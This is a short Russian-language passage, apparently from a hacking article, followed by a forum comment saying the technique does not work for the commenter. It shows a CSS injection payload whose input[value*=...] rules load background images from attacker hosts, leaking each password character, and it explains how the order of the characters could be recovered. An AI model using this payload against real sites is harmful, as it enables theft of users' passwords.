input[value*=“\x10”]{ background:url(“//xakepsite.com/?h=\x10”); } … и так далее … input[value*=“\x7F”]{ background:url(“//attacker.com/?h=\x7F”); } Что это дает? Каждый раз, когда символ пароля попадает в диапазон 10-7F, отсылается соответствующий запрос. Таким образом, по выходу у нас будут все символы пароля. Останется только расположить их в нужном порядке. В реальной жизни диапазон в 111 символов можно расширить, а с помощью асинхронных включений CSS восстановить и последовательность символов. Тут я останавливаться не буду, пример реализации - eaea.sirdarckcat.net/cssar. кто-нибудь пользовался таким? у меня почемуто не работает....
